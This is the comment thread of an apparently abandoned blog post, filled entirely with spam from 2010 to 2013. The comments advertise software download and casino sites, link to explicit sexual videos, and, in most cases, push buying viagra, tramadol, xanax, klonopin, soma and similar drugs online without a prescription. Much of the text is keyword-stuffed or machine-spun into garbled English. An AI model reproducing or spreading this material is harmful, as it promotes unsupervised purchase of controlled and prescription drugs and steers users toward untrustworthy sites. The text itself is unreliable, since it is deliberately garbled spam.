    By Anonymous Anonymous, at July 12, 2010 at 5:33 PM  

  • url for [b]download software for windows[/b] are available here:

    download software for windows
    [url=http://www.downloadsoftwareforwindows.com]download software for windows[/url]

    [url=http://www.downloadsoftwareforwindows.com/products/download-iphone-video-converter/productpage.php]download iphone video converter[/url]

    download youtube to mp3 converter

    By Anonymous Anonymous, at July 13, 2010 at 2:41 PM  

  • address for [b]software downloads[/b] are available at:

    Windows YouTube downloader
    [url=http://www.1800soft.com]Windows YouTube downloader[/url]

    betting software
    [url=http://www.betextremesoft.com]betting software[/url]

    buy software for windows
    [url=http://www.buysoftwareforwindows.com]buy software for windows[/url]

    download software for windows
    [url=http://www.downloadsoftwareforwindows.com]download software for windows[/url]

    Download Youtube Videos
    [url=http://www.downloadyoutubevideos.co.uk]Download Youtube Videos[/url]

    FLV to AVI converter
    [url=http://www.flvtoavi.co.uk]FLV to AVI[/url]

    DVD ripper
    [url=http://www.flvtodvd.com]DVD ripper[/url]

    Video converter
    [url=http://www.hollydollyvideo.com]Video converter[/url]

    Home video converter software
    [url=http://www.homevideopage.com]Home video software[/url]

    Poker software
    [url=http://www.pokerwinningvideo.com]Poker video software[/url]

    Shark Video Downloader
    [url=http://www.sharkvideopage.com]Shark Video Downloader software[/url]

    Simplest YouTube Internet Video Downloader
    [url=http://www.simplestutils.com]Watermark Software[/url]

    Popular screensavers
    [url=http://www.popularscreensaverpage.com]Popular Screensaver[/url]

    Hyper YouTube Magic Tool XXX
    [url=http://www.andromedaapps.com]Hyper YouTube Magic Tool XXX[/url]

    Free FLV converter
    [url=http://www.cassiopeiasoft.com]Free FLV converter[/url]

    Working YouTube downloader
    [url=http://www.pegasusapps.com]Working YouTube downloader[/url]

    By Anonymous Anonymous, at July 14, 2010 at 8:34 PM  

  • This is good site to spent time on. allergy Read a useful article about tramadol tramadol

    By Anonymous Anonymous, at January 28, 2012 at 9:14 AM  

  • top [url=http://www.001casino.com/]001casino.com[/url] coincide the latest [url=http://www.casinolasvegass.com/]las vegas casino[/url] manumitted no set aside bonus at the foremost [url=http://www.baywatchcasino.com/]casino games
    [/url].

    By Anonymous Anonymous, at January 7, 2013 at 1:31 AM  

  • viagra online viagra online 100mg - viagra dosage 150

    By Anonymous Anonymous, at January 11, 2013 at 9:33 PM  

  • generic viagra online generic viagra online us pharmacy - viagra men

    By Anonymous Anonymous, at January 24, 2013 at 8:52 AM  

  • buy cheap viagra viagra vs cialis - buy viagra us paypal

    By Anonymous Anonymous, at January 24, 2013 at 1:05 PM  

  • viagra online without prescription purchase viagra placebo - viagra canadian pharmacy reviews

    By Anonymous Anonymous, at January 25, 2013 at 3:56 AM  

  • viagra online without prescription viagra jet - purchase viagra online pharmacy

    By Anonymous Anonymous, at January 26, 2013 at 12:57 PM  

  • viagra online without prescription cheap viagra meds - viagra for women side effects

    By Anonymous Anonymous, at January 28, 2013 at 12:05 AM  

  • buy soma generic for sumatriptan - soma drug huxley

    By Anonymous Anonymous, at February 2, 2013 at 3:33 AM  

  • soma 350 mg soma drug alcohol - soma bikes

    By Anonymous Anonymous, at February 3, 2013 at 9:26 PM  

  • top [url=http://www.xgambling.org/]free casino games[/url] brake the latest [url=http://www.casinolasvegass.com/]las vegas casino[/url] manumitted no deposit hand-out at the leading [url=http://www.baywatchcasino.com/]casino
    [/url].

    By Anonymous Anonymous, at February 3, 2013 at 11:05 PM  

  • buy soma online soma-online.org - soma zero offset seatpost

    By Anonymous Anonymous, at February 4, 2013 at 9:35 AM  

  • buy soma online drug interactions cymbalta soma - buy soma with american express

    By Anonymous Anonymous, at February 5, 2013 at 7:42 AM  

  • buy soma online 9 panel drug test soma - soma drug slang

    By Anonymous Anonymous, at February 6, 2013 at 2:08 PM  

  • buy soma soma drug in a brave new world - images of generic soma

    By Anonymous Anonymous, at February 7, 2013 at 6:37 AM  

  • soma online buy somatropin usa - soma drug cost

    By Anonymous Anonymous, at February 7, 2013 at 8:33 AM  

  • buy soma some medication - soma 50mg

    By Anonymous Anonymous, at February 8, 2013 at 4:33 PM  

  • buy cialis no prescription cialis 36 hour price - generic cialis mail order

    By Anonymous Anonymous, at February 10, 2013 at 7:33 PM  

  • buy cialis online cialis vs levitra vs viagra - average retail price cialis

    By Anonymous Anonymous, at February 11, 2013 at 12:28 AM  

  • tramadol online tramadol for dogs vs people - tramadol and breastfeeding

    By Anonymous Anonymous, at February 11, 2013 at 10:08 PM  

  • buy cialis online buy cialis online with paypal - cheap cialis online us

    By Anonymous Anonymous, at February 12, 2013 at 6:16 AM  

  • order tramadol online mastercard zydol 50 mg tramadol hydrochloride - tramadol 50mg can you get high

    By Anonymous Anonymous, at February 12, 2013 at 1:06 PM  

  • Amazing african american person having a wonderful look and massive tits indicates very little away about web camera for everyone who will certainly check out [url=http://www.xvideos.com/video1851111/cute_lesbians_having_fun]Brown bunnie in the bath[/url] Attractive incredible crazy together with very good cunt viewing depth with genitals.and masturbator screwing clitoris extremely tough , Slut stroking huge penis Both these hot little sluts are actually not wanting to show a person yet soon heat towards concept of possessing a threesome. http://www.xvideos.com/video1894936/penny_gives_a_nice_handjob Wonderful breasts open , The following cougar discovered her animals and speedily pounced upon it as well as took the application for a ride and also got creamed.

    By Anonymous Anonymous, at February 15, 2013 at 12:51 PM  

  • xanax online xanax buy online australia - what are xanax pills prescribed for

    By Anonymous Anonymous, at February 19, 2013 at 4:43 PM  

  • carisoprodol 350 mg carisoprodol side effects withdrawal - carisoprodol 350 mg strength

    By Anonymous Anonymous, at February 22, 2013 at 1:06 PM  

  • tramadol cheap tramadol online bestellen - ultram vs tramadol side effects

    By Anonymous Anonymous, at February 23, 2013 at 6:52 AM  

  • cheap xanax xanax green bars s 90 3 - xanax bars get high

    By Anonymous Anonymous, at February 23, 2013 at 8:22 AM  

  • generic xanax xanax online prescription - buy xanax online 2mg

    By Anonymous Anonymous, at February 23, 2013 at 1:32 PM  

  • buy tramadol can you buy tramadol over counter - tramadol for dogs online

    By Anonymous Anonymous, at February 23, 2013 at 1:54 PM  

  • can you buy xanax online xanax effects yahoo - xanax effects relationships

    By Anonymous Anonymous, at February 25, 2013 at 12:31 AM  

  • generic xanax xanax lyrics - effexor xanax drug interactions

    By Anonymous Anonymous, at February 25, 2013 at 4:19 PM  

  • cialis online cialis when to take - cialis cheap fast delivery

    By Anonymous Anonymous, at February 28, 2013 at 8:34 AM  

  • xanax online buy alprazolam forum - buy xanax online pharmacy no prescription

    By Anonymous Anonymous, at March 1, 2013 at 1:13 AM  

  • buy cialis online no prescription cialis online genuine - generic cialis available us

    By Anonymous Anonymous, at March 3, 2013 at 4:58 AM  

  • buy tramadol tramadol 100mg usa - tramadol 93 58 information

    By Anonymous Anonymous, at March 5, 2013 at 11:45 PM  

  • buy klonopin online long does 2mg klonopin stay system - klonopin withdrawal nausea

    By Anonymous Anonymous, at March 6, 2013 at 1:49 PM  

  • buy tramadol tramadol withdrawal in a neonate - tramadol hcl 50 mg addiction

    By Anonymous Anonymous, at March 6, 2013 at 2:41 PM  

  • learn how to buy tramdadol buy tramadol online without prescriptions - buy tramadol online overnight delivery

    By Anonymous Anonymous, at March 10, 2013 at 7:43 PM  

  • buy klonopin online buy brand klonopin online - klonopin 2 mg erowid

    By Anonymous Anonymous, at March 12, 2013 at 2:34 AM  

  • http://www.integrativeonc.org/adminsio/buyklonopinonline/#1735 klonopin side effects urination - how to buy clonazepam

    By Anonymous Anonymous, at March 12, 2013 at 1:40 PM  

  • carisoprodol 350 mg carisoprodol expiration - soma 350 mg dosage

    By Anonymous Anonymous, at March 15, 2013 at 4:45 PM  

  • carisoprodol 350 mg carisoprodol dosage erowid - carisoprodol vs soma

    By Anonymous Anonymous, at March 19, 2013 at 7:11 AM  

  • Blogger: QODS ec - Post a Comment [url=http://www.acompliadietpillonsale.net/]acomplia price [/url] acomplia weight loss - order acomplia online - acomplia no prescription - http://www.acompliadietpillonsale.net/ [url=http://www.buyingtopamaxcheap.net/] Topamax Online [/url] order topamax - Topamax Online - buy topamax without prescription [url=http://www.cymbaltarxbuyonline.net/] Buy Duloxetine Online [/url] order cymbalta online - Cheap Cymbalta - price of cymbalta [url=http://www.buyingprovigilcheap.net/] Buy Modafinil [/url] purchase provigil - Order Provigil Online - buy generic provigil online no prescription

    By Anonymous Anonymous, at June 13, 2013 at 4:39 PM  

Post a Comment

<< Home


Get Firefox!